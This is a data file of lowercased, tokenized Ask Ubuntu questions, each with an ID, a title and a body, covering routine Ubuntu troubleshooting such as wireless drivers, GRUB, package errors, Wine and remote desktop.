98576	how do i get an ssh -x session to use the host 's sound settings	i have a usb sound card on a host system which has all my music , and to which i have connected my living room speakers . i would like to use my laptop to ssh -x into that system and run my favorite music player remotely , so that sound is played on the usb sound card on the host system . however , when i ssh in , and start the music player , it does not seem to see my sound settings there ( even though i 'm logged in with the same user with which i would normally log in ) and will only play using the internal sound card . is there a way that i can make the ssh session pick up the ( i assume ) pulseaudio settings that i get on normal logins ?
98577	how do i place a application list icon in the launcher ?	if i click dash and then the second tab ( search applications ) , one of the items available is `` installed applications '' . is there anyway to put a quick link to this in the launcher ? basically a icon like home that will instead open a list of all installed applications ?
98578	is there an easy to use video encoder ?	i would like to know whether is there an all-in-one application to encode crop resize and mux video files ( something like megui for windows ) for ubuntu . i do n't feel like study too hard to learn how to use ffmpeg
98579	how do i get lucida fonts ?	it used to be that you installed sun-java6-fonts , but that package is gone . what do you install now ?
98580	gma3150 on samsung n100 ( atom n435 ) not working	i 've installed ubuntu 11.10 desktop on samsung n100 instead of meego . and , unfortunately , when i opened system info , i saw that the graphics are undefined . i 've installed the latest intel drivers ( using tips from this site ) , but still nothing works . youtube videos @ 360p and above aren'y smooth because of no hardware accel. , which should have been provided by gma3150 . how can i make the system recognize the graphics ? i have looked at the following questions : where can i download intel hd vga driver for my dell inspiron n5010 ? graphics driver for intel 3150 ? intel gma3150 on samsung n150
98581	bcm4306 , b43 legacy driver installed , but `` firmware missing '' error	i have the following wireless hardware on a compaq evo n600c laptop running lubuntu latest . ciaran @ compaq : ~ $ lspci -vvnn | grep 14e4 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4306 802.11b/g wireless lan controller [ 14e4:4320 ] ( rev 03 ) following the instructions from here : http : //www.linuxwireless.org/en/users/drivers/b43 # b43_and_b43legacy i opted for the legacy firmware installer , following instructions for internet install to the letter ( with no errors ) . i.e . i successfully installed sudo apt-get install firmware-b43legacy-installer in the nm-applet i now get wireless networks device not ready ( firmware missing ) i open up additional drivers , but the list is empty . i have commented out this line in /etc/modprobe.d/blacklist.conf # blacklist bcm43xx contents of firmware dir : ciaran @ compaq : /etc/modprobe.d $ sudo ls /lib/firmware/b43legacy/ [ sudo ] password for ciaran : a0g0bsinitvals2.fw a0g0initvals5.fw b0g0bsinitvals2.fw b0g0initvals5.fw ucode11.fw ucode5.fw a0g0bsinitvals5.fw a0g1bsinitvals5.fw b0g0bsinitvals5.fw pcm4.fw ucode2.fw a0g0initvals2.fw a0g1initvals5.fw b0g0initvals2.fw pcm5.fw ucode4.fw edit : from dmesg : [ 4460.193382 ] b43-phy0 error : firmware file `` b43/ucode5.fw '' not found [ 4460.193393 ] b43-phy0 error : firmware file `` b43-open/ucode5.fw '' not found [ 4460.193401 ] b43-phy0 error : you must go to http : //wireless.kernel.org/en/users/drivers/b43 # devicefirmware and download the correct firmware for this driver version . please carefully read all instructions on this website . yours in hope .
98582	does this non-usb non-cd install process work for ubuntu ?	i found an article from 2007 on how to install linux without using a usb stick or a cd at http : //www.instantfundas.com/2007/08/install-any-linux-distro-directly-from.html . i was wondering if anyone could tell me whether this still works , given it 's five years old . for starters i found that the initrd.gz file does n't seem to exist but a initrd.lz file does . edit : and when i do try it , i get an `` error 21 : linux kernal must be loaded before initrd '' .
98587	ubuntu hud - ppa for precise only ?	i read marks blog regarding hud hud - blog i went to install the ppa from here hud ppa . i used the usual command to install a ppa sudo add-apt-repository ppa : unity-team/hud however when i update it can not find this ppa . fetched 1,474 kb in 11s ( 133 kb/s ) w : failed to fetch http : //ppa.launchpad.net/unity- team/hud/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/unity- team/hud/ubuntu/dists/oneiric/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/unity-team/hud/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . looking in the ppa information it states i can also add it via deb http : //ppa.launchpad.net/unity-team/hud/ubuntu precise main deb-src http : //ppa.launchpad.net/unity-team/hud/ubuntu precise main does that mean the ppa wo n't work with oneiric ? if it should have i done something wrong ?
98588	juju and keys for multiple administrators	we are currently doing some testing to see if juju will fit our needs to deploy a new application to ec2 . we have three developers that need to be able to make changes to the the deployed instances , but . . . . . . right now , only the person that bootstrapped juju is the only one who can make changes . obviously this does n't work out very well . we are aware of the authorized-keys-path and the authorized-keys settings for the environments.yml files , but ca n't seem to get them to work correctly . how are they supposed to be setup in order to allow multiple people to administer the deployed instances ?
98597	increase verbosity of running rsync process ?	i 'm running 'rsync -a -i /foo /bar ' . every now and then i would like to know what exactly rsync is doing at the moment without having the -v output all the time . is it possible to increase the verbosity of running processes e.g . by sending a kill signal ?
98598	how do i get gta : san andreas and most wanted to work in wine ?	i have installed versions of san andreas and most wanted which i used to just click and play in windows but in ubuntu they do n't seem to work . i have installed wine 1.3 but while using san andreas all i get is black and white screens which flash . to try to fix the problem i gave this command in terminal : sudo apt-get remove -- purge wine wine1.3 . now i suppose it is installing wine 1.2 .
98602	will final version of 12.04 use the power management changes found in kernel 3.3	i have seen in some version of ubuntu that instead of making a huge change to update to the latest kernel , they take some of the good stuff out of it , for the sake of stability and put it on a previous version . in this case , kernel 3.3 has seen some very good power management enhancements that are not all found in the kernel 3.2 . my question then is : will this updates in 3.3 be somehow pulled into the 3.2 kernel used for ubuntu 12.04 ?
98604	will alsa 1.0.25 version have time to enter 12.04	alsa version 1.0.25 which comes with many good updates landed today . will it have time to enter 12.04 since it just so happen i have 2 creative sound cards that as 1.0.25 mentions will work out of the box ( instead of having no sound at all ) .
98606	wine for windows games	i have wine 1.3 and playonlinux , winetricks and q4 that gui for wine and have tried many things but i am not able to run san andreas and mostwanted . the games both start but they appear as coloured blocks . the start screen is flashing black and white and winedb rates the games as platinum and gold respectively . what do i do ? ? i have tried other windows soft wares on wine the work fine ...
98607	filter results into a usable variable	i run the following command : sudo iwlist eth0 scan and get output that looks like this : cell 01 - address : ab : cd : ef:12:34:56 essid : '' name '' protocol : ieee 802.11g mode : master frequency:2.417 ghz ( channel 2 ) encryption key : on i wo n't bother filling it all out , as i 'm trying to fix a laptop and i can not simply copy the output . how can i use built-in tools such as grep , awk , sed , etc . to fetch information given certain criteria ? for example : i want to grab the mac address when knowing the essid . i also do n't want to rely on the cell # or line positions . knowing common information , like the word address before the mac is fine . expected output : ab : cd : ef:12:34:56 i want to use it in a variable , like so : sudo iwconfig eth1 ap $ ( command ) where command would result in the expected result . if there 's another way of pushing the result as a variable using > or something , that works as well . ( command > sudo iwconfig eth1 ap $ 1 ) thanks .
98608	how to remove the `` ubuntu desktop '' role after applied in mythbuntu control center	hi i want to know how to remove the `` ubuntu desktop '' role after applied in mythbuntu control center . so im back with my default desktop and programs . im running mythbuntu 11.10 64 bit does anyone know what packages it installs so i can uninstall them ?
98617	how do i shrink and divide the ubuntu partition after installing it alongside windows xp ?	i wanted to shrink the partition of my ubuntu to 20gb after i used the `` install alongside windows '' option and divided my hd into 2 partitions : ( winos-60gb , ubuntu-100gb ) my goal is to split hd into 3 partitions : winos-60gb , ubuntu-20gb , storage space-80gb . how do i do this ?
98628	can clementine sync with an ipod ?	i have a 5th gen ipod classic 150g . i 've read there there are some issues with them and linux . clementine transfers my new music as files to the ipod as if it were a hard drive . i can look at the files from my computer but i can not listen to them . how can clementine send my music so the ipod can see , read and play them ?
98631	how to use arraylist in vala using anjuta as ide ?	i 've been trying to use anjuta to start using vala . it was working well until i tried to use an arraylist . the gee library does n't seem to work in anjuta ; it seems to be working when i compiled it manually . am i missing something ?
98632	synchronized two tsystem using ubuntu one	i had download many applications and installed in my laptop , without repeating same procedure on my desktop is to lengthy , is it is possible to apply same changes using backup or ubuntu one
98633	ca n't install openjdk6	well it started downloading packages but in between due to connection failure it stoped and now when i again run the same command i got this error : err http//in.archive.ubuntu.com/ubuntu/ maverick-updates/main openjdk-6-jre-headless i386 6b20-1.9.10-0ubuntu1~10.10.2 404 not found [ ip : 91.189.92.179 80 ] err http//security.ubuntu.com/ubuntu/ maverick-security/main openjdk-6-jre-headless i386 6b20-1.9.10-0ubuntu1~10.10.2 404 not found [ ip : 91.189.92.167 80 ] err http//security.ubuntu.com/ubuntu/ maverick-security/main openjdk-6-jre i386 6b20-1.9.10-0ubuntu1~10.10.2 404 not found [ ip : 91.189.92.167 80 ] err http//security.ubuntu.com/ubuntu/ maverick-security/main openjdk-6-jdk i386 6b20-1.9.10-0ubuntu1~10.10.2 404 not found [ ip : 91.189.92.167 80 ] failed to fetch http//security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b20-1.9.10-0ubuntu1~10.10.2_i386.deb 404 not found [ ip : 91.189.92.167 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b20-1.9.10-0ubuntu1~10.10.2_i386.deb 404 not found [ ip : 91.189.92.167 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b20-1.9.10-0ubuntu1~10.10.2_i386.deb 404 not found [ ip : 91.189.92.167 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
98635	how to backup ubuntu installation ?	i am very happy with ubuntu , the way my friend set up all basic applications like libreoffice and web browser , ubuntu rolls smoother than expected . i am ex-windows user , just worried to back to everything with all softwares-n-settings preserved so that it can be re-installed if anything goes wrong . is there any way i can back-up everything like re-mountable iso ? please suggest the best method to back-up whole set-up for exactly same configuration so that i do not depend on my friend who set it for me .
98637	ram upgrade installation	i have a toshiba satellite l455d-s5976 and it is 2 gb ddr2 . ok , i have installed it a 4 gb ddr2 ram but , when i check the system info it says : memory : 2.8 gib . i do n't know if that number is refering to the ram quantity , but i want to know if i have done rigth the process ? i can use my computer normally , but i do n't know either if it have to make something different or be more fast , dunno . any answers are welcome .
98639	update ubuntu 11.10 without internet connection	i 'm completely new to ubuntu 11.10 oneric ocelot desktop i386 plus no internet connection . i have a freshly install of ubuntu and i want to install clockworkmod tether to have internet connection thru my smartphone ( via usb ) , but in order to do that , i need to run a .sh file . i have readed online that i need a bunch of things to install it , like build-essential , g++ compiler ... and a lot of things . i would like to download all software needed on windows ( i got windows 7 and ubuntu 11.10 ) and installed using a usb thumb or a cd , since i got internet connection on windows . what 's the best ( easiest ) way to do that ? or any tutorial ?
98640	linux image broken in grub menu	i have ubuntu 11.10 . in my grub menu , i have following images : linux 3 . * linux 2 . * linux 2 . * my linux 3 . * image is broken ( if i try to boot from first image , i.e . linux 3 . * , i get my caps and scroll lights blinking , and nothing appears on my screen ) . if i boot from my second image , everything works just fine . my update manager shows everything updated . my software sources are updated . how do i fix my grub loader . thanks .
98642	how to display dash home by keyboard shortcut	i wish to press super ( or any other key combination ) and start typing to launch programs . how do i do it ? thanks
98644	wireless internet sharing is mac stuff only	i have a mac g5 and have installed ubuntu 10.10 . it works great except i ca n't share my internet connection wirelessly with any thing except mac devices ( itouch and an ipod ) . my touchpad and windows laptop will not even detect my adhoc network . any suggestio
98650	what would another ubuntu user 's default font be ?	if i send an email from , say , thunderbird , and have `` helvetica/arial '' set as my default outgoing font , then my assumption is that most of the world will read that email in helvetica ( apple ) or arial ( windows ) . but what if i send that email to another ubuntu user who does not have the ms core fonts installed ? what will the email 's font default to ? would ubuntu override it with something like sans-serif , perhaps ?
98653	will installing gnome3 remove ubuntu classic ?	i am on ubuntu 11.04 using ubuntu classic desktop environment and i want to try gnome3 , how should i install it and will installing it remove ubuntu classic ?
98656	should ubuntu work with dell dimension 8200 ?	i want to install ubuntu on a dell dimension 8200 but it wo n't install . it starts booting isolinux from cd but one row of installation is all i get , then it 's like either the cd is broken or that for some unexplained other reason it wo n't install . should it work ? thanks
98659	how to get rid of low battery warning message ?	my application running on a laptop-like device is controlling battery status on its own but when laptop battery is critically low gnome power management message box appears : as my gui style is totally different i would like to permanently disable / uninstall this gnome feature . how to achieve this ? edit : i am on ubuntu 10.04 lts
98664	how can i get smooth fonts in lyx ?	i opened the introduction in lyx and used ctrl+r to view it in evince . the fonts appear nice and smooth . if i copy and paste the first couple of paragraphs into a new document and render that , the fonts have jagged , pixellated edges ( especially visible upon zooming ) . this is with no customisation to lyx at all â a fresh installation via synaptic . i ca n't see any differences between the document settings for the new documents ( although there are probably some differences due to autodetection ) . how can i make the fonts look smooth in my own documents ? particularly of the article class and beamer presentations ?
98667	what are the current legal issues going on between ubuntu and microsoft ?	i know this is none of my business , still , since microsoft always tries to bump its competitors , i was wondering what current legal issues are going on between ubuntu and microsoft corp. , and is there anyway common ubuzens like me can help in those matters ?
98670	ext4 suitable partition backup tool ?	i just tried partimage , it does n't have a ext4 support officially , all my partition was displayed as ext3fs , and my lvm volume are named as dm-x . so i 'm wondering if there 's another workable graphical or semi-graphical tool for backing up a partition ? thanks !
98674	ubuntu lost after resizing its partition	i had a partition ( sda11 ) which ubuntu 11.10 was installed on it . i resized this partition from 34 gb to 150 gb . then i lost the grub menu . i use the boot-repair application to fix it . but now when i restart my pc , only microsoft windows xp will boot and the grub menu not shown . i tried to use grub-install , grub-update , grub , bootable mbr repair softwares , and ... , but nothing appened ! i try to install ubuntu again on sda11 , but the installer say : `` saving installed packages ... '' 'til now ! ! how can i repair grub and recover my ubuntu ? ? ?
98677	unable to login ( ubuntu 11.10 )	i 'm having a weird issue . when i put my password using my account ( ramiz ) on the login screen of gui , a blink of screen and it take me back to the login screen . i tried with guest user and it is logging me in . i also tried ctrl+atl+f1 to switch to command mode and try to login there with sudo -s. and give my login id ( ramiz ) and password there it successfully logged me there in the command mode . i remember i ran few chmod/chown command which cause me this issue . before this happened everytime i launch terminal i got a error msg of permission denied which is something like `` bash : xxxxx permission denied '' . i also lost rights on .bashrc file which i think happened after i ran those chmod/chown commands . please , help !
98678	when will btrfs-progs ( stable ? ? ) arrive in the repositories ?	just realized that arch linux exchanged btrfs-progs-unstable ( from 2010 ) with btrfs-progs ( from 2012 , presumably stable , at least not unstable ) . i am aware that arch is normally very quick at upgrading . when is this ( or kind of ) package expected to arrive in official ubuntu repos ? thanks ...
98680	how to download a package with all required dependencies ?	i want download ghc6 . but , when i type sudo apt-get install ghc6 sudo apt-get -f install ghc6 sudo apt-get install -- reinstal ghc6 it gives same error : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ghc6 : depends : libgmp3-dev but it is not installable depends : libffi-dev but it is not installable depends : libbsd-dev but it is not installable e : broken packages how can i fix that or how can i install ghc6 to my desktop ubuntu 10.04 edit : apt-cache policy ghc6 libgmp3-dev ; apt-cache show ghc6 libgmp3-dev ghc6 : installed : ( none ) candidate : 6.12.1-12 version table : 6.12.1-12 0 500 http : //archive.ubuntu.com/ubuntu/ lucid/universe packages libgmp3-dev : installed : ( none ) candidate : ( none ) version table : package : ghc6 priority : optional section : universe/devel installed-size : 378532 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > original-maintainer : kari pahula < kaol @ debian.org > architecture : amd64 version : 6.12.1-12 replaces : ghc6-doc ( = 6.12.1-8 ) , haddock ... conflicts : ghc4 ( < = 4.08.1-4 ) , haddock breaks : cabal-install ( < < 0.8.0 ) , ghc6-doc ( < = 6.12.1-8 ) , haskell-devscripts ( < < 0.6.19 ) filename : pool/universe/g/ghc6/ghc6_6.12.1-12_amd64.deb ... description : ghc - the glasgow haskell compilation system ... additional documentation can be found in the `haskell-doc ' package . alternatively , there is an online version at http : //haskell.org/onlinereport/ . homepage : http : //haskell.org/ghc/ bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu sudo apt-get install libgmp3-dev libffi-dev libbsd-dev e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
98688	black screen after update ubuntu 11.10	i am completely stuck after updating ubuntu 11.10 on hp elitebook with intel graphics . i first installed the amd64 version from a usb key and everyting was fine . then i started the update process as the system recommended to so . eventually , the system does n't boot . i get the grub screen , then no more . no purple screen , no ubuntu message . the only workaround i found is to press 'e ' in grub and add a `` nomodeset '' option . the system boots but the screen resolution is not good and i have no dual display . booting in recovery mode works too . with the live version , it works like a charm . the first boot after install is ok too . should i refuse the recommended system updates ? i do n't even see an error message and do n't know where to look for . thank you for your help .
98691	safe removing of startup ( manager )	lenovoz570 , i7 x64,8gb , 700gb , nvidia optimus+intel , 1366x768 , win7+11.10 ubuntu+kubuntu . until now nvidia isnâ´t installed or used . some problems , which may relay one on another or interact : + after running startup to configure grub2 strange things happen during boot or at shutdown + startup loaded 19mb but nearly nothing is to change . i choose ubuntu 30015 , it is shown on the button but at boot only the cursor is on old recovery 30014 + 14 entries in grub , 6 ubuntu ( 30012,30014,30015 ) 4kubuntu ( 30014,30015 ) 2win7 and 2 mem so the question : is it possible to remove that useless `` startup '' without blackout ? it changed more than 25 places .
98692	how to add support for the global menu to a python non-gtk , non-qt app ?	i 'm looking for good documentation ( an example , tutorial , or guide ) on how to add global menu support to a non-gtk , non-qt application . ( in gtk it works 'magically ' for the main menu ... ) . the toolkit i want to use this with is kivy , which supports the glib-mainloop ( e.g . for gstreamer ) , so in principle all should work there . i have seen the api reference of dbusmenu and here , but that is not very helpful for understanding the mechanisms . there is a short example for creating a launcher-quicklist which contains a dbus-menu , but not for the global-menu / appmenu . there is a wiki page that does not contain any relevant information other then `` work on supporting other the application menu on other toolkits would be welcome , but not a priority for the dx team , help wanted . '' there is a little information in this graphic from the indicator-appmenu source code , but its not enough , can not be found on developer.ubuntu.com and requires more explanation : so : what is the procedure that gets a set of menu items ( dbusmenu.menuitem ) to be displayed ? what role does the client and the server play ? ( which of those is supposed to be run in my application ? or both ? ) similar question
98695	safe remove of grub and lilo instead ?	lenovoz570 , i7 x64,8gb , 700gb , nvidia optimus+intel , 1366x768 , win7+11.10 ubuntu+kubuntu . until now nvidia isnâ´t installed or used . some problems , which may relay one on another or interact : * two grub2 , one inactive on the ubuntu partition and one at mbr really on kubuntu partition * after running startup to configure grub2 strange things happen during boot or at shutdown * 14 entries in grub , 6 ubuntu ( 30012,30014,30015 ) 4kubuntu ( 30014,30015 ) 2win7 and 2 memtest at pc-paper com was written , it is best to run win boot manager , as long as there is win on the machine . but i work more with linux and remember `` lilo '' from suse doing a nicely job . is it possible to remove this boring grub2 safely and install lilo , despite it is from a rival business ?
98702	how to unblock something listed in rfkill ?	i think i may have found the cause of my problems with connecting to wifi in ubuntu 11.10 . i type this in terminal : peter @ peter-ao531h : ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : acer-wireless : wireless lan soft blocked : yes hard blocked : no peter @ peter-ao531h : ~ $ rfkill unblock all peter @ peter-ao531h : ~ $ if i am correct i must unblock all of those `` yes '' , right ? but nothing happens when i try to unblock . am i typing the wrong command ? typing `` sudo modprobe -r acer_wmi '' seem to have added another problem , now i ca n't even try to click on the `` enable wireless '' -button as it has been grayed out and `` 1 : acer-wireless : wireless lan '' does not show anymore in the rfkill list . does anyone have any idea how to fix that ? edit : i rebooted and now it is not grayed out anymore and the rfkill list all shows as : 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : acer-wireless : wireless lan soft blocked : yes hard blocked : no the 0 is not hard blocked anymore , but i guess 1 needs to be put off soft blocked somehow .
98705	is there any invariable hardware system identifier in ubuntu/linux	at the current i am using ethernet mac address to generate license for my program , but sometimes there is more than one ethernet card ( wireless , modem , etc. ) . so i would like to use something else : maybe there is an motherboard identificator or something else ? ! i need to get this id using python ...
98706	unable to create hotspot with internet connection for ipod 4g ?	i used the network - > use as hotspot button to make a network and i can connect to it just fine . however , no internet packets are going through to my connected device , an ipod 4g . how can you create hotspot successfully in ubuntu 11.10 for ipod 4g ?
98707	how do i make my java app compatible with the unity global menu ?	i like to develop in java but also want compatibility with the global menu ? is there a way ? please help .
98709	how to recover boot menu if i lost my password during the installation	i got a new laptop with ubuntu ready to be installed from the factory . i installed to near the end that it 's ask me to key-in login , password , retyped password and computer name . then , i came to my old laptop to do something else . when i went back , it showed me the normal login page . but i try to login but it 's falied . i know exactly what my password is but the problem is it may be too long and it may be accidentally the same with the retyped . i thought that it 's now a problem since i just re-install it from the boot menu using one from factory . but the problem is that there is no more boot menu . so how can i bring back the boot menu ? i have tried everything in this question : how do i reset a lost administrative ( root ) password ? either left shift , right shift or both did n't help . that 's why my question is 'bring back ' rather than 'display ' .
98715	how to know actives ssh port forwarding	i have configured in ~/.ssh/config many port forwarding for vnc with different port for each servers . is there a command which can help me to know which port is forwarding to when i open an ssh session ? best regards stephane
98723	restore an evolution file	i would like to use my evolution package on a laptop . to do this i used evolution to make a backup copy to a memory stick and attempted to use that memory stick from the laptop , in evolution to do a restore . the laptop ( ubuntu 11.10 ) version of evolution doe not recognize the file . the error message is invalid evolution back up file i checked further and the evolution backup file has zero bites ?
98734	hybrid graphics intel/radeon hd 6630m	i bought a dell vostro 3450 with hybrid gpu and i do n't know how to configure properly , i think the fan is running at full speed , also i 'm really new in this os , so i would appreciate all the help you can give me . thanks a lot ! . hardware 2nd generation intel®core™ i5-2450m 2.50ghz 6 gb2 dos canales sdram ddr3 a 1333 mhz amd radeon™ hd 6630m ( 128-bit ) 1gb vram since i 'm new , i ca n't post images : (
98736	instant messaging clients	are there any instant messaging clients with custom emoticons like on the windows live messenger or do i have to use wine for it ? i 've already tried pidgin and the default empathy clients . none have emoticons how i like them .
98738	wubi - permission denied `` errno '' 13	after wubi finishes , i get an error message saying `` permission denied errno 13 this is the end of the log file : **01-26 09:51 error tasklist : [ errno 13 ] permission denied : 'f : \\wubildr' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 483 , in diskimage_bootloader file `` \lib\shutil.py '' , line 39 , in copyfile ioerror : [ errno 13 ] permission denied : 'f : \\wubildr' 01-26 09:51 debug tasklist : # cancelling tasklist 01-26 09:51 debug tasklist : # finished tasklist 01-26 09:51 error root : [ errno 13 ] permission denied : 'f : \\wubildr' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 483 , in diskimage_bootloader file `` \lib\shutil.py '' , line 39 , in copyfile ioerror : [ errno 13 ] permission denied : 'f : \\wubildr'** i have nothing in drive f : , it 's empty . ubuntu will run , but freezes after a few minutes . any ideas how i can fix this problem ? have i missed a step ? computer is an hp pavilion hpe , i 'm logged on as administrator .
98740	thunderbird inbox still shows messages i moved to another imap folder with a different client	i 'm using different clients to access my email by imap from diferent devices ( pc , phone ) . when i move a message to my archive folder using my phone ( using k9mail ) , the message remains in my inbox in thunderbird . is there a way to fix this behaviour ?
98742	wireless connection failure with a sweex wireless 54g adapter	my internet access was fine , when i shut down my pc and then open it again ! then , the pc recognized the net 's name but it does not recognize the password to the wireless ! ! for some reason my mobile has access and internet settings are all good ( which means that internet is fine and there 's something wrong with the computer ) ! it still connects with an ethernet but can not connect wireless ! i desperately need some help here !
98743	update notification not appearing when an update is available	i have a laptop and a pc . on the laptop , whenever an update comes it tells me there is an update in two ways . the first one is a red alert/warning icon in the upper panel . the other one is the notification bubble that mentions there is an update and how many updates are available as seen on this image : the problem is that on the pc it does not mention any updates , nor does it show a notification bubble saying that i have updates . i have to literally go to the gear in the top right corner and see if it tells me something like in this image : as one can see in this second image there is no red alert/warning that i have updates waiting and there is no bubble telling me that there are updates ready . how can i add this to the pc so i know when updates are available .
98748	gedit inserts blank lines sporadically when using scroll wheel	i do extensive editing of text files using gedit . if i use the scroll wheel to move back and forth in the file , sometimes a blank line is inserted in the file . this is not obvious when it occurs . i discover the blank line ( s ) later , so i do n't know where i was in the file relative to where the blank line gets inserted . the only way i have found not to have blank lines inserted is not to use the scroll wheel . has anybody else noticed this behavior ? any ideas how to get it corrected ?
98749	installing r on ubuntu - getting updates to work	i have installed r. when i update my system it however complains that the r updates are n't authentificated . what do i have to do to authentificate them ?
98752	broken package after update : linux-headers , error broken count > 0	ubuntu 10.04 . after an update , i get a red warning icon in the system tray , warning about an error : broken count > 0 opening update manager , i see that the broken package is linux-headers-2.6.32-38 ( new install ) trying to use the update manager , i get a further error message : you have 1 broken package on your system ! use the `` broken '' filter to locate it . and then : e : /var/cache/apt/archives/linux-headers-2.6.32-38_2.6.32-38.83_all.deb : unable to create `/usr/src/linux-headers-2.6.32-38/arch/arm/mach-netx/include/mach/vmalloc.h.dpkg-new ' ( while processing `./usr/src/linux-headers-2.6.32-38/arch/arm/mach-netx/include/mach/vmalloc.h ' ) i tried apt-get clean as suggested in another question on this site , and tried reinstalling the package in synaptic . one option i have not tried is simply to restart , but i do n't dare to in case i ca n't reboot back into ubuntu . i have also tried apt-get install -- fix-broken and i get the following : the following extra packages will be installed : linux-headers-2.6.32-38 the following new packages will be installed linux-headers-2.6.32-38 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 0b/9,937kb of archives . after this operation , 76.2mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 589950 files and directories currently installed . ) unpacking linux-headers-2.6.32-38 ( from ... /linux-headers-2.6.32-38_2.6.32-38.83_all.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-2.6.32-38_2.6.32-38.83_all.deb ( -- unpack ) : unable to create `/usr/src/linux-headers-2.6.32-38/arch/arm/mach-nomadik/makefile.boot.dpkg-new ' ( while processing `./usr/src/linux-headers-2.6.32-38/arch/arm/mach-nomadik/makefile.boot ' ) : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : subprocess paste killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-2.6.32-38_2.6.32-38.83_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
98754	maintain terminal session after reboot ?	i recently installed and started using guake terminal . i really enjoy the way it keeps terminal sessions active after closing the window , however whenever i reboot i have to rerun some of the tabs that i usually keep alive for programs such as irssi . i would like to know if there is a way to either remember sessions after reboot , or to reopen tabs and rerun set commands . for example , when i reboot guake will automatically create a new tab called irc which immediately runs screen irssi .
98757	how to connect two pcs with nomachine ? what goes where ?	i i have two pc , both running ubuntu 11.10 . they are running on the same lan , both are connected via wireless . i usually connect them with the default running remote desktop viewer on pc1 and desktop sharing on pc2 . the connection is so damn slow it is unusable . people will recommend nomachine for much faster remote desktop , but i cant understand how to configure the connection . if , i want to view the desktop of pc2 with pc1 , what do i have to install where . it seems to me that i have to install nomachine client on pc1 , but how do i have to configure pc2 so it can be accessible with pc1 . do i have to install something ? i tried starting `` desktop sharing '' on pc2 , but cant seem to connect with nomachine client . any help welcome .
98766	how to configure how much ram usage should to start swapping on ubuntu	i always notice that ubuntu start using swap , as soon as the ram usage is around 60-70 % . how to configure it so it should wait so ram usage became 80-90 % . and is there a way to empty the swap , as soon as the there is space available on the ram , other than swapoff manually ?
98771	ubuntu startup script	is there a way to look at the script of things that xubuntu does when it starts up ? also to see the error logs it generates ?
98773	ca n't boot ubuntu from grub after installing slitaz	after installing slitaz today i wanted to create a dualboot with lubuntu i had installed before . somehow the grub does n't load lubuntu ( error 15 ) . i 've added a screenshot of the current menu.lst can anyone help me with this ? i just wanted to test slitaz , but now i seem to have lost all access to my ubuntu ! !
98782	how to run an alias in a shell script ?	i have an executable file mpiexec , whose full path is ~/petsc-3.2-p6/petsc-arch/bin/mpiexec . since i want to execute this command in different directories ( without having to retype the entire path ) , i setup an alias in my home .bashrc file : alias petsc= '' ~/petsc-3.2-p6/petsc-arch/bin/mpiexec '' which allows me to execute this mpiexec file at the command prompt easily by typing : petsc myexecutable i tried to write a shell script file , named script , using my new alias petsc as a command . after giving my shell script the appropriate permissions ( using chmod ) , i tried to run the script . however , it gave me the following error : ./script : line 1 : petsc : command not found i know that i could just write the full path to the mpiexec file , but it is cumbersome to write the full path everytime that i want to write a new script . is there a way that i can use my alias petsc inside the script file ? is there a way i can edit my .bashrc or .bash_profile to make this happen ?
98784	safely unmount external drive on lubuntu	i 'm using lubuntu and have an external hard drive . i would like to safely unmount the external hard drive . clicking the eject button in the file manager unmounts the drive , but does not power it down . ( edit : clicking on mount and then unplugging the drive means , at least on my machine , that the drive is still spinning when it 's unplugged . this is n't good for the drive , so it 's not good for my data ! ) naturally , 'umount ' does not perform this function . i can issue 'sudo hdparm -y /dev/sdb ' , but this still leaves the drive 's light on and i do n't think it syncs the drive . i seem to recall 'sudo sdparm -- command=stop /dev/sdb ' powering the drive down appropriately in the past , but this does n't seem to be working now , and it 's a mystery as to why the gui does n't have an option to do this . any suggestions ?
98788	how to install texlive2011 ?	i just moved from windows to ubuntu . software center in ubuntu does have texlive2009 package . there is no straightforward installation process from tug , or from google search result . i found some installation of texlive2010 but it does not work . here are the step : download an texlive2011.iso , 2.3gb and save in local drive mount to a virtual drive install perl tk ( ok ) '' sudo ./install-tl '' does not work , `` perl ./install-tl '' shows pre-installation setting but it does not have the write access to /usr/local/textlive/2011/ finally , i 'm stuck please guide me with a step by step tutorial or suggest any other solution beside typing in the black screen without knowing what is going on behind the terminal .
